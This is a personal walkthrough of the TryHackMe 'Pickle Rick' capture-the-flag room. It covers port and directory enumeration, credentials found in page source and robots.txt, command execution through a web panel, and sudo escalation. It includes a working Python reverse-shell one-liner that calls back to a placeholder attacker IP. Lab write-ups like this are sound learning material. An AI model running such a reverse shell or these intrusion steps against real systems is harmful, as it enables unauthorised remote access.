TryHackMe Pickle Rick Writeup

Enumeration

First I used nmap to find what services/ports were open on the IP address

nmap -vv -T4 [IP Address]

Here we find that port 22 and 80 are open

I then start an aggressive scan on the system to get more information

nmap -A [IP Address]

We get the OS (Ubuntu) and web server version(Apache/2.4.18) from this scan.

After scanning the ports/services of the system, we then try to find directories in the web server with dirsearch

Here we can see the directories of the web server.

Alright let’s now visit the site on a browser and try to get more info

Website

There is not really much information at first glance but we see that we require a password to logon onto Rick’s account

I then look at the source code (right click+view source code/inspect element) and find the username only R1ckRul3s (sad)

Source code of the website

Let’s further enumerate into the web server by checking /assets/

/assets/

Luckily it has indexing on and we are able to see the files in the /assets/

Not really much info here so lets head on to /robots.txt/

/robots.txt/

Google search reveals that it is Rick’s catchphrase

(Sorry I don’t watch rick & morty)

Could it be the password?

Let’s head on to login.php and try logging in with R1ckRul3s as the username and Wubbalubbadubdub as the password

After logging in

It works!

It seems like we can execute commands in this panel

Let’s try to list the contents of this directory /var/www/html

Listing the contents

We got one ingredient! And a clue! YAY

Let’s output the file

Failed Attempt 1

It doesn’t work…

Let’s try to get a reverse shell instead

Exploitation

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings

With this link as my source, I decided to try a bash reverse shell

Well, that didn’t work, so I tried a python reverse shell instead

(Make sure to change the “python” to “python3” at the start of your command)

python3 -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP_Address”,4343));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’

I accidentally terminated by machine hence the machine ip is different

It worked!

We successfully found the first ingredient!

Let’s look at the clue (clue.txt) to get information on where the next ingredient is.

I decided to look at rick’s home directory as he had one

And we found it!

the quotation marks are to reference files with spaces

Now for the last ingredient

There are some directories we cannot visit such as /root due to our permissions

(I totally forgot about sudo and had to seek help lol)

Lets try to view /root with sudo

Let’s open the 3rd ingredient

And we are finally done!

From this challenge, I have learnt

How important enumeration is

How to use dirsearch

More on reverse shells

How important sudo is